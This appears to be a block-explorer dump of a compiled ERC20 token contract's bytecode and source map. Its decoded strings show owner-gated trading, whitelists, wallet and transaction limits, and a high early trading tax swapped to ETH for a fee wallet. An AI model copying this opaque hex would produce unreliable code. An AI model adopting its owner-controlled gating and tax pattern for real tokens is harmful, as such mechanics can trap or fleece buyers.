f0380d29a05caa09f0d92588560e90602001610944565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610eb361181f565b6001600160a01b038116610f185760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161090a565b610f2181611879565b50565b6001600160a01b038316610f36575f80fd5b6001600160a01b038216610f48575f80fd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661100a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161090a565b6001600160a01b038216610f485760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161090a565b5f6110768484610e81565b90505f1981146110dd57818110156110d05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161090a565b6110dd8484848403610fa8565b50505050565b6001600160a01b0383166111095760405162461bcd60e51b815260040161090a90611e91565b6001600160a01b03821661112f5760405162461bcd60e51b815260040161090a90611ed6565b5f811161117e5760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e2030000000604482015260640161090a565b600554600160a01b900460ff16156115a5576005546001600160a01b038481169116148015906111bc57506005546001600160a01b03838116911614155b80156111d057506001600160a01b03821615155b80156111e757506001600160a01b03821661dead14155b156115a557600554600160a81b900460ff166112e3576001600160a01b0383165f908152600e602052604090205460ff168061123a57506001600160a01b0382165f908152600e602052604090205460ff165b6112865760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e000000604482015260640161090a565b6005546001600160a01b038481169116146112e35760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c656400000000000000604482015260640161090a565b7f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d096001600160a01b0316836001600160a01b031614801561133c57506001600160a01b0382165f908152600e602052604090205460ff16155b15611423576009548111156113ab5760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b606482015260840161090a565b600b546001600160a01b0383165f908152602081905260409020546113d09083611e63565b111561141e5760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c657400604482015260640161090a565b6115a5565b7f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d096001600160a01b0316826001600160a01b031614801561147c57506001600160a01b0383165f908152600e602052604090205460ff16155b156114ed57600a5481111561141e5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b606482015260840161090a565b6001600160a01b0382165f908152600e602052604090205460ff1615801561152d57506001600160a01b0383165f908152600e602052604090205460ff16155b156115a557600b546001600160a01b0383165f908152602081905260409020546115579083611e63565b11156115a55760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c657400604482015260640161090a565b305f90815260208190526040902054600c54811080159081906115d15750600554600160b01b900460ff165b80156115e0575060125460ff16155b801561161e57507f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d096001600160a01b0316856001600160a01b031614155b801561164257506001600160a01b0385165f908152600d602052604090205460ff16155b801561166657506001600160a01b0384165f908152600d602052604090205460ff16155b1561168b576012805460ff191660011790556116806118ca565b6012805460ff191690555b6001600160a01b0385165f908152600d602052604090205460019060ff16806116cb57506001600160a01b0385165f908152600d602052604090205460ff165b156116d357505f5b5f811561180b57600554600160b81b900460ff16156116f4576116f461193f565b7f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d096001600160a01b0316866001600160a01b031614801561173657505f600754115b156117735760646007548661174b9190611e2d565b6117559190611e44565b90508060085f8282546117689190611e63565b909155506117ed9050565b7f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d096001600160a01b0316876001600160a01b03161480156117b557505f600654115b156117ed576064600654866117ca9190611e2d565b6117d49190611e44565b90508060085f8282546117e79190611e63565b90915550505b80156117fe576117fe8730836119c7565b6118088186611f19565b94505b6118168787876119c7565b50505050505050565b6005546001600160a01b031633146109815760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161090a565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b305f908152602081905260409020546008548115806118e7575080155b156118f0575050565b600c5482111561190057600c5491505b61190982611aef565b6010546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610a28573d5f803e3d5ffd5b5f601154116119835760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b604482015260640161090a565b60115443905f90611995906006611e63565b90508082116119ac57601960068190556007555050565b600460068190556007556005805460ff60b81b191690555050565b6001600160a01b0383166119ed5760405162461bcd60e51b815260040161090a90611e91565b6001600160a01b038216611a135760405162461bcd60e51b815260040161090a90611ed6565b6001600160a01b0383165f9081526020819052604090205481811015611a8a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161090a565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36110dd565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611b2257611b22611f2c565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611b92573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611bb69190611f40565b81600181518110611bc957611bc9611f2c565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac94790611c209085905f90869030904290600401611f5b565b5f604051808303815f87803b158015611c37575f80fd5b505af1158015611c49573d5f803e3d5ffd5b505050505050565b6001600160a01b0381168114610f21575f80fd5b5f8060408385031215611c76575f80fd5b8235611c8181611c51565b946020939093013593505050565b5f6020808352835180828501525f5b81811015611cba57858101830151858201604001528201611c9e565b505f604082860101526040601f19601f8301168501019250505092915050565b5f60208284031215611cea575f80fd5b8135611cf581611c51565b9392505050565b5f805f60608486031215611d0e575f80fd5b8335611d1981611c51565b92506020840135611d2981611c51565b929592945050506040919091013590565b5f60208284031215611d4a575f80fd5b5035919050565b5f8060408385031215611d62575f80fd5b50508035926020909101359150565b8015158114610f21575f80fd5b5f8060408385031215611d8f575f80fd5b8235611d9a81611c51565b91506020830135611daa81611d71565b809150509250929050565b5f8060408385031215611dc6575f80fd5b8235611dd181611c51565b91506020830135611daa81611c51565b600181811c90821680611df557607f821691505b602082108103611e1357634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b80820281158282048414176107b7576107b7611e19565b5f82611e5e57634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156107b7576107b7611e19565b5f60208284031215611e86575f80fd5b8151611cf581611d71565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b818103818111156107b7576107b7611e19565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611f50575f80fd5b8151611cf581611c51565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015611fa95784516001600160a01b031683529383019391830191600101611f84565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122091bb0e4e87641972a57ee89e694e0afd1f1296565e24417c9e90dd5c07bf8f1164736f6c63430008150033

Deployed Bytecode Sourcemap

23481:10352:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27433:192;;;;;;;;;;-1:-1:-1;27433:192:0;;;;;:::i;:::-;;:::i;:::-;;;635:14:1;;628:22;610:41;;598:2;583:18;27433:192:0;;;;;;;;12189:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;14549:201::-;;;;;;;;;;-1:-1:-1;14549:201:0;;;;;:::i;:::-;;:::i;24191:33::-;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;24191:33:0;1215:177:1;24292:63:0;;;;;;;;;;-1:-1:-1;24292:63:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;13318:108;;;;;;;;;;-1:-1:-1;13406:12:0;;13318:108;;15330:261;;;;;;;;;;-1:-1:-1;15330:261:0;;;;;:::i;:::-;;:::i;32389:300::-;;;;;;;;;;-1:-1:-1;32389:300:0;;;;;:::i;:::-;;:::i;:::-;;24558:27;;;;;;;;;;;;;;;;13160:93;;;;;;;;;;-1:-1:-1;13160:93:0;;13243:2;2437:36:1;;2425:2;2410:18;13160:93:0;2295:184:1;16000:238:0;;;;;;;;;;-1:-1:-1;16000:238:0;;;;;:::i;:::-;;:::i;24524:25::-;;;;;;;;;;-1:-1:-1;24524:25:0;;;;-1:-1:-1;;;;;24524:25:0;;;;;;-1:-1:-1;;;;;2648:32:1;;;2630:51;;2618:2;2603:18;24524:25:0;2484:203:1;23542:33:0;;;;;;;;;;-1:-1:-1;23542:33:0;;;;-1:-1:-1;;;23542:33:0;;;;;;23660:28;;;;;;;;;;-1:-1:-1;23660:28:0;;;;-1:-1:-1;;;23660:28:0;;;;;;24119;;;;;;;;;;;;;;;;24013;;;;;;;;;;;;;;;;23622:31;;;;;;;;;;-1:-1:-1;23622:31:0;;;;-1:-1:-1;;;23622:31:0;;;;;;13489:127;;;;;;;;;;-1:-1:-1;13489:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;13590:18:0;13563:7;13590:18;;;;;;;;;;;;13489:127;2178:103;;;;;;;;;;;;;:::i;26133:84::-;;;;;;;;;;;;;:::i;24050:26::-;;;;;;;;;;;;;;;;24085:27;;;;;;;;;;;;;;;;26825:184;;;;;;;;;;-1:-1:-1;26825:184:0;;;;;:::i;:::-;;:::i;1537:87::-;;;;;;;;;;-1:-1:-1;1610:6:0;;-1:-1:-1;;;;;1610:6:0;1537:87;;12408:104;;;;;;;;;;;;;:::i;28651:178::-;;;;;;;;;;-1:-1:-1;28651:178:0;;;;;:::i;:::-;;:::i;16741:436::-;;;;;;;;;;-1:-1:-1;16741:436:0;;;;;:::i;:::-;;:::i;13822:193::-;;;;;;;;;;-1:-1:-1;13822:193:0;;;;;:::i;:::-;;:::i;24154:30::-;;;;;;;;;;;;;;;;26655:162;;;;;;;;;;-1:-1:-1;26655:162:0;;;;;:::i;:::-;;:::i;23582:33::-;;;;;;;;;;-1:-1:-1;23582:33:0;;;;-1:-1:-1;;;23582:33:0;;;;;;26465:182;;;;;;;;;;-1:-1:-1;26465:182:0;;;;;:::i;:::-;;:::i;27633:315::-;;;;;;;;;;-1:-1:-1;27633:315:0;;;;;:::i;:::-;;:::i;23723:118::-;;;;;;;;;;;;23798:42;23723:118;;27956:223;;;;;;;;;;;;;:::i;33503:290::-;;;;;;;;;;-1:-1:-1;33503:290:0;;;;;:::i;:::-;;:::i;23850:120::-;;;;;;;;;;;;23927:42;23850:120;;23979:27;;;;;;;;;;;;;;;;24362:43;;;;;;;;;;-1:-1:-1;24362:43:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;32697:305;;;;;;;;;;-1:-1:-1;32697:305:0;;;;;:::i;:::-;;:::i;14078:151::-;;;;;;;;;;-1:-1:-1;14078:151:0;;;;;:::i;:::-;;:::i;2436:201::-;;;;;;;;;;-1:-1:-1;2436:201:0;;;;;:::i;:::-;;:::i;24477:40::-;;;;;;;;;;;;;;;27433:192;27507:4;27548;27564:31;27572:7;27548:4;27588:6;27564:7;:31::i;:::-;27613:4;27606:11;;;27433:192;;;;;:::o;12189:100::-;12243:13;12276:5;12269:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12189:100;:::o;14549:201::-;14632:4;833:10;14688:32;833:10;14704:7;14713:6;14688:8;:32::i;15330:261::-;15427:4;833:10;15485:38;15501:4;833:10;15516:6;15485:15;:38::i;:::-;15534:27;15544:4;15550:2;15554:6;15534:9;:27::i;:::-;-1:-1:-1;15579:4:0;;15330:261;-1:-1:-1;;;;15330:261:0:o;32389:300::-;1423:13;:11;:13::i;:::-;32518:5:::1;32497:13;13406:12:::0;;;13318:108;32497:13:::1;:17;::::0;32513:1:::1;32497:17;:::i;:::-;32496:27;;;;:::i;:::-;32485:6;:39;;32463:137;;;::::0;-1:-1:-1;;;32463:137:0;;5429:2:1;32463:137:0::1;::::0;::::1;5411:21:1::0;5468:2;5448:18;;;5441:30;5507:34;5487:18;;;5480:62;-1:-1:-1;;;5558:18:1;;;5551:46;5614:19;;32463:137:0::1;;;;;;;;;32611:12;:21:::0;;;32648:33:::1;::::0;1361:25:1;;;32648:33:0::1;::::0;1349:2:1;1334:18;32648:33:0::1;;;;;;;;32389:300:::0;:::o;16000:238::-;16088:4;833:10;16144:64;833:10;16160:7;16197:10;16169:25;833:10;16160:7;16169:9;:25::i;:::-;:38;;;;:::i;:::-;16144:8;:64::i;2178:103::-;1423:13;:11;:13::i;:::-;2243:30:::1;2270:1;2243:18;:30::i;:::-;2178:103::o:0;26133:84::-;1423:13;:11;:13::i;:::-;26187:14:::1;:22:::0;;-1:-1:-1;;;;26187:22:0::1;::::0;;26133:84::o;26825:184::-;26920:10;26900:31;;;;:19;:31;;;;;;;;26892:40;;;;;;26943:58;;-1:-1:-1;;;26943:58:0;;-1:-1:-1;;;;;6032:15:1;;26943:58:0;;;6014:34:1;26982:10:0;6064:18:1;;;6057:43;6116:18;;;6109:34;;;26958:4:0;;26943:34;;5949:18:1;;26943:58:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;26825:184;;:::o;12408:104::-;12464:13;12497:7;12490:14;;;;;:::i;28651:178::-;1423:13;:11;:13::i;:::-;28739:1:::1;28727:9;:13;28719:55;;;::::0;-1:-1:-1;;;28719:55:0;;6606:2:1;28719:55:0::1;::::0;::::1;6588:21:1::0;6645:2;6625:18;;;6618:30;6684:31;6664:18;;;6657:59;6733:18;;28719:55:0::1;6404:353:1::0;28719:55:0::1;1610:6:::0;;28785:36:::1;::::0;-1:-1:-1;;;;;1610:6:0;;;;28785:36;::::1;;;::::0;28811:9;;28785:36:::1;::::0;;;28811:9;1610:6;28785:36;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;28651:178:::0;:::o;16741:436::-;16834:4;833:10;16834:4;16917:25;833:10;16934:7;16917:9;:25::i;:::-;16890:52;;16981:15;16961:16;:35;;16953:85;;;;-1:-1:-1;;;16953:85:0;;6964:2:1;16953:85:0;;;6946:21:1;7003:2;6983:18;;;6976:30;7042:34;7022:18;;;7015:62;-1:-1:-1;;;7093:18:1;;;7086:35;7138:19;;16953:85:0;6762:401:1;16953:85:0;17074:60;17083:5;17090:7;17118:15;17099:16;:34;17074:8;:60::i;13822:193::-;13901:4;833:10;13957:28;833:10;13974:2;13978:6;13957:9;:28::i;26655:162::-;1423:13;:11;:13::i;:::-;26746:12:::1;:25:::0;;;;26782:13:::1;:27:::0;26655:162::o;26465:182::-;1423:13;:11;:13::i;:::-;-1:-1:-1;;;;;26550:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;26550:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;26605:34;;610:41:1;;;26605:34:0::1;::::0;583:18:1;26605:34:0::1;;;;;;;26465:182:::0;;:::o;27633:315::-;1423:13;:11;:13::i;:::-;27765:5:::1;27744:13;13406:12:::0;;;13318:108;27744:13:::1;:17;::::0;27760:1:::1;27744:17;:::i;:::-;27743:27;;;;:::i;:::-;27732:6;:39;;27710:140;;;::::0;-1:-1:-1;;;27710:140:0;;7370:2:1;27710:140:0::1;::::0;::::1;7352:21:1::0;7409:2;7389:18;;;7382:30;7448:34;7428:18;;;7421:62;-1:-1:-1;;;7499:18:1;;;7492:49;7558:19;;27710:140:0::1;7168:415:1::0;27710:140:0::1;27861:15;:24:::0;;;27901:39:::1;::::0;1361:25:1;;;27901:39:0::1;::::0;1349:2:1;1334:18;27901:39:0::1;1215:177:1::0;27956:223:0;1423:13;:11;:13::i;:::-;28015:12:::1;::::0;:17;28007:66:::1;;;::::0;-1:-1:-1;;;28007:66:0;;7790:2:1;28007:66:0::1;::::0;::::1;7772:21:1::0;7829:2;7809:18;;;7802:30;7868:34;7848:18;;;7841:62;-1:-1:-1;;;7919:18:1;;;7912:34;7963:19;;28007:66:0::1;7588:400:1::0;28007:66:0::1;28099:12;28084;:27:::0;28122:13:::1;:20:::0;;-1:-1:-1;;;;28153:18:0;-1:-1:-1;;;28153:18:0;;;27956:223::o;33503:290::-;1423:13;:11;:13::i;:::-;33643:7:::1;33622:13;13406:12:::0;;;13318:108;33622:13:::1;:17;::::0;33638:1:::1;33622:17;:::i;:::-;33621:29;;;;:::i;:::-;33608:9;:42;;33586:152;;;::::0;-1:-1:-1;;;33586:152:0;;8195:2:1;33586:152:0::1;::::0;::::1;8177:21:1::0;8234:2;8214:18;;;8207:30;8273:34;8253:18;;;8246:62;8344:30;8324:18;;;8317:58;8392:19;;33586:152:0::1;7993:424:1::0;33586:152:0::1;33755:18;:30:::0;33503:290::o;32697:305::-;1423:13;:11;:13::i;:::-;32827:5:::1;32806:13;13406:12:::0;;;13318:108;32806:13:::1;:17;::::0;32822:1:::1;32806:17;:::i;:::-;32805:27;;;;:::i;:::-;32794:6;:39;;32772:138;;;::::0;-1:-1:-1;;;32772:138:0;;8624:2:1;32772:138:0::1;::::0;::::1;8606:21:1::0;8663:2;8643:18;;;8636:30;8702:34;8682:18;;;8675:62;-1:-1:-1;;;8753:18:1;;;8746:47;8810:19;;32772:138:0::1;8422:413:1::0;32772:138:0::1;32921:13;:22:::0;;;32959:35:::1;::::0;1361:25:1;;;32959:35:0::1;::::0;1349:2:1;1334:18;32959:35:0::1;1215:177:1::0;14078:151:0;-1:-1:-1;;;;;14194:18:0;;;14167:7;14194:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14078:151::o;2436:201::-;1423:13;:11;:13::i;:::-;-1:-1:-1;;;;;2525:22:0;::::1;2517:73;;;::::0;-1:-1:-1;;;2517:73:0;;9042:2:1;2517:73:0::1;::::0;::::1;9024:21:1::0;9081:2;9061:18;;;9054:30;9120:34;9100:18;;;9093:62;-1:-1:-1;;;9171:18:1;;;9164:36;9217:19;;2517:73:0::1;8840:402:1::0;2517:73:0::1;2601:28;2620:8;2601:18;:28::i;:::-;2436:201:::0;:::o;21088:289::-;-1:-1:-1;;;;;21203:19:0;;21195:28;;;;;;-1:-1:-1;;;;;21242:21:0;;21234:30;;;;;;-1:-1:-1;;;;;21285:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;21337:32;;1361:25:1;;;21337:32:0;;1334:18:1;21337:32:0;;;;;;;21088:289;;;:::o;20734:346::-;-1:-1:-1;;;;;20836:19:0;;20828:68;;;;-1:-1:-1;;;20828:68:0;;9449:2:1;20828:68:0;;;9431:21:1;9488:2;9468:18;;;9461:30;9527:34;9507:18;;;9500:62;-1:-1:-1;;;9578:18:1;;;9571:34;9622:19;;20828:68:0;9247:400:1;20828:68:0;-1:-1:-1;;;;;20915:21:0;;20907:68;;;;-1:-1:-1;;;20907:68:0;;9854:2:1;20907:68:0;;;9836:21:1;9893:2;9873:18;;;9866:30;9932:34;9912:18;;;9905:62;-1:-1:-1;;;9983:18:1;;;9976:32;10025:19;;20907:68:0;9652:398:1;21668:419:0;21769:24;21796:25;21806:5;21813:7;21796:9;:25::i;:::-;21769:52;;-1:-1:-1;;21836:16:0;:37;21832:248;;21918:6;21898:16;:26;;21890:68;;;;-1:-1:-1;;;21890:68:0;;10257:2:1;21890:68:0;;;10239:21:1;10296:2;10276:18;;;10269:30;10335:31;10315:18;;;10308:59;10384:18;;21890:68:0;10055:353:1;21890:68:0;22002:51;22011:5;22018:7;22046:6;22027:16;:25;22002:8;:51::i;:::-;21758:329;21668:419;;;:::o;28841:3540::-;-1:-1:-1;;;;;28973:18:0;;28965:68;;;;-1:-1:-1;;;28965:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29052:16:0;;29044:64;;;;-1:-1:-1;;;29044:64:0;;;;;;;:::i;:::-;29136:1;29127:6;:10;29119:52;;;;-1:-1:-1;;;29119:52:0;;11425:2:1;29119:52:0;;;11407:21:1;11464:2;11444:18;;;11437:30;11503:31;11483:18;;;11476:59;11552:18;;29119:52:0;11223:353:1;29119:52:0;29188:14;;-1:-1:-1;;;29188:14:0;;;;29184:1855;;;1610:6;;-1:-1:-1;;;;;29241:15:0;;;1610:6;;29241:15;;;;:49;;-1:-1:-1;1610:6:0;;-1:-1:-1;;;;;29277:13:0;;;1610:6;;29277:13;;29241:49;:86;;;;-1:-1:-1;;;;;;29311:16:0;;;;29241:86;:128;;;;-1:-1:-1;;;;;;29348:21:0;;29362:6;29348:21;;29241:128;29219:1809;;;29409:13;;-1:-1:-1;;;29409:13:0;;;;29404:359;;-1:-1:-1;;;;;29481:37:0;;;;;;:31;:37;;;;;;;;;:105;;-1:-1:-1;;;;;;29551:35:0;;;;;;:31;:35;;;;;;;;29481:105;29447:220;;;;-1:-1:-1;;;29447:220:0;;11783:2:1;29447:220:0;;;11765:21:1;11822:2;11802:18;;;11795:30;11861:31;11841:18;;;11834:59;11910:18;;29447:220:0;11581:353:1;29447:220:0;1610:6;;-1:-1:-1;;;;;29698:15:0;;;1610:6;;29698:15;29690:53;;;;-1:-1:-1;;;29690:53:0;;12141:2:1;29690:53:0;;;12123:21:1;12180:2;12160:18;;;12153:30;12219:27;12199:18;;;12192:55;12264:18;;29690:53:0;11939:349:1;29690:53:0;29845:15;-1:-1:-1;;;;;29837:23:0;:4;-1:-1:-1;;;;;29837:23:0;;:63;;;;-1:-1:-1;;;;;;29865:35:0;;;;;;:31;:35;;;;;;;;29864:36;29837:63;29811:1202;;;29987:12;;29977:6;:22;;29943:155;;;;-1:-1:-1;;;29943:155:0;;12495:2:1;29943:155:0;;;12477:21:1;12534:2;12514:18;;;12507:30;12573:34;12553:18;;;12546:62;-1:-1:-1;;;12624:18:1;;;12617:45;12679:19;;29943:155:0;12293:411:1;29943:155:0;30181:15;;-1:-1:-1;;;;;13590:18:0;;13563:7;13590:18;;;;;;;;;;;30155:22;;:6;:22;:::i;:::-;:41;;30121:158;;;;-1:-1:-1;;;30121:158:0;;12911:2:1;30121:158:0;;;12893:21:1;12950:2;12930:18;;;12923:30;12989:33;12969:18;;;12962:61;13040:18;;30121:158:0;12709:355:1;30121:158:0;29811:1202;;;30383:15;-1:-1:-1;;;;;30377:21:0;:2;-1:-1:-1;;;;;30377:21:0;;:63;;;;-1:-1:-1;;;;;;30403:37:0;;;;;;:31;:37;;;;;;;;30402:38;30377:63;30351:662;;;30527:13;;30517:6;:23;;30483:158;;;;-1:-1:-1;;;30483:158:0;;13271:2:1;30483:158:0;;;13253:21:1;13310:2;13290:18;;;13283:30;13349:34;13329:18;;;13322:62;-1:-1:-1;;;13400:18:1;;;13393:47;13457:19;;30483:158:0;13069:413:1;30351:662:0;-1:-1:-1;;;;;30694:35:0;;;;;;:31;:35;;;;;;;;30693:36;:99;;;;-1:-1:-1;;;;;;30755:37:0;;;;;;:31;:37;;;;;;;;30754:38;30693:99;30667:346;;;30895:15;;-1:-1:-1;;;;;13590:18:0;;13563:7;13590:18;;;;;;;;;;;30869:22;;:6;:22;:::i;:::-;:41;;30835:158;;;;-1:-1:-1;;;30835:158:0;;12911:2:1;30835:158:0;;;12893:21:1;12950:2;12930:18;;;12923:30;12989:33;12969:18;;;12962:61;13040:18;;30835:158:0;12709:355:1;30835:158:0;31100:4;31051:28;13590:18;;;;;;;;;;;31158;;31134:42;;;;;;;31207:35;;-1:-1:-1;31231:11:0;;-1:-1:-1;;;31231:11:0;;;;31207:35;:61;;;;-1:-1:-1;31260:8:0;;;;31259:9;31207:61;:104;;;;;31295:15;-1:-1:-1;;;;;31287:23:0;:4;-1:-1:-1;;;;;31287:23:0;;31285:26;31207:104;:147;;;;-1:-1:-1;;;;;;31329:25:0;;;;;;:19;:25;;;;;;;;31328:26;31207:147;:188;;;;-1:-1:-1;;;;;;31372:23:0;;;;;;:19;:23;;;;;;;;31371:24;31207:188;31189:316;;;31422:8;:15;;-1:-1:-1;;31422:15:0;31433:4;31422:15;;;31452:10;:8;:10::i;:::-;31477:8;:16;;-1:-1:-1;;31477:16:0;;;31189:316;-1:-1:-1;;;;;31557:25:0;;31517:12;31557:25;;;:19;:25;;;;;;31532:4;;31557:25;;;:52;;-1:-1:-1;;;;;;31586:23:0;;;;;;:19;:23;;;;;;;;31557:52;31553:100;;;-1:-1:-1;31636:5:0;31553:100;31665:12;31704:7;31700:628;;;31733:9;;-1:-1:-1;;;31733:9:0;;;;31730:57;;;31761:9;:7;:9::i;:::-;31834:15;-1:-1:-1;;;;;31828:21:0;:2;-1:-1:-1;;;;;31828:21:0;;:42;;;;;31869:1;31853:13;;:17;31828:42;31824:355;;;31925:3;31908:13;;31899:6;:22;;;;:::i;:::-;31898:30;;;;:::i;:::-;31891:37;;31962:4;31947:11;;:19;;;;;;;:::i;:::-;;;;-1:-1:-1;31824:355:0;;-1:-1:-1;31824:355:0;;32033:15;-1:-1:-1;;;;;32025:23:0;:4;-1:-1:-1;;;;;32025:23:0;;:43;;;;;32067:1;32052:12;;:16;32025:43;32021:158;;;32122:3;32106:12;;32097:6;:21;;;;:::i;:::-;32096:29;;;;:::i;:::-;32089:36;;32159:4;32144:11;;:19;;;;;;;:::i;:::-;;;;-1:-1:-1;;32021:158:0;32199:8;;32195:91;;32228:42;32244:4;32258;32265;32228:15;:42::i;:::-;32302:14;32312:4;32302:14;;:::i;:::-;;;31700:628;32340:33;32356:4;32362:2;32366:6;32340:15;:33::i;:::-;28954:3427;;;;28841:3540;;;:::o;1702:132::-;1610:6;;-1:-1:-1;;;;;1610:6:0;833:10;1766:23;1758:68;;;;-1:-1:-1;;;1758:68:0;;13822:2:1;1758:68:0;;;13804:21:1;;;13841:18;;;13834:30;13900:34;13880:18;;;13873:62;13952:18;;1758:68:0;13620:356:1;2797:191:0;2890:6;;;-1:-1:-1;;;;;2907:17:0;;;-1:-1:-1;;;;;;2907:17:0;;;;;;;2940:40;;2890:6;;;2907:17;2890:6;;2940:40;;2871:16;;2940:40;2860:128;2797:191;:::o;33012:483::-;33103:4;33059:23;13590:18;;;;;;;;;;;33151:11;;33179:20;;;:46;;-1:-1:-1;33203:22:0;;33179:46;33175:85;;;33242:7;;33012:483::o;33175:85::-;33294:18;;33276:15;:36;33272:105;;;33347:18;;33329:36;;33272:105;33391:32;33407:15;33391;:32::i;:::-;33444:10;;33436:51;;-1:-1:-1;;;;;33444:10:0;;;;33465:21;33436:51;;;;;33444:10;33436:51;33444:10;33436:51;33465:21;33444:10;33436:51;;;;;;;;;;;;;;;;;;;28187:454;28263:1;28248:12;;:16;28226:69;;;;-1:-1:-1;;;28226:69:0;;14183:2:1;28226:69:0;;;14165:21:1;14222:2;14202:18;;;14195:30;-1:-1:-1;;;14241:18:1;;;14234:46;14297:18;;28226:69:0;13981:340:1;28226:69:0;28379:12;;28329;;28306:20;;28379:16;;28394:1;28379:16;:::i;:::-;28352:43;;28425:16;28409:12;:32;28406:227;;28473:2;28458:12;:17;;;28490:13;:18;28785:36:::1;28651:178:::0;:::o;28406:227::-;28556:1;28541:12;:16;;;28572:13;:17;28604:9;:17;;-1:-1:-1;;;;28604:17:0;;;28215:426;;28187:454::o;17647:806::-;-1:-1:-1;;;;;17744:18:0;;17736:68;;;;-1:-1:-1;;;17736:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17823:16:0;;17815:64;;;;-1:-1:-1;;;17815:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17965:15:0;;17943:19;17965:15;;;;;;;;;;;17999:21;;;;17991:72;;;;-1:-1:-1;;;17991:72:0;;14528:2:1;17991:72:0;;;14510:21:1;14567:2;14547:18;;;14540:30;14606:34;14586:18;;;14579:62;-1:-1:-1;;;14657:18:1;;;14650:36;14703:19;;17991:72:0;14326:402:1;17991:72:0;-1:-1:-1;;;;;18099:15:0;;;:9;:15;;;;;;;;;;;18117:20;;;18099:38;;18317:13;;;;;;;;;;:23;;;;;;18369:26;;1361:25:1;;;18317:13:0;;18369:26;;1334:18:1;18369:26:0;;;;;;;18408:37;26825:184;27017:408;27116:16;;;27130:1;27116